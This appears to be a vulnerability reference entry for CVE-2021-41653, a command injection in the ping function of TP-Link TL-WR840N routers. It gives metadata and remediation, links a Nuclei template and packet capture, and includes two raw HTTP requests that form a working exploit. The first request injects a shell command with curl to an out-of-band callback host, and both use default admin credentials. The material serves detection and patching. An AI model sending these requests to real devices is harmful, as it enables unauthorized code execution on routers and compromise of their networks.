| Title | TP-Link - OS Command Injection |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. |
| Remediation | Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". |
| CVSS Score | 9.8 |
| EPSS Score | 0.91914 |
| CVE ID | CVE-2021-41653 |
| CWE ID | CWE-94 |
| Tags | cve2021 cve tplink rce router tp-link vkev vuln |
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
POST /cgi?2 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
Connection: close
Content-Length: 254
Content-Type: text/plain
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Referer: http://www.victim.com/mainFrame.htm
Accept-Encoding: gzip
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=4
host=$(echo 127.0.0.1; curl http://d5jo6a1le0o2oa7moolgxggbg193drb1b.oast.online -H 'User-Agent: UTVl1m')
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
POST /cgi?7 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
Connection: close
Content-Length: 42
Content-Type: text/plain
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Referer: http://www.victim.com/mainFrame.htm
Accept-Encoding: gzip
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41653.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-41653.pcap
N/AN/A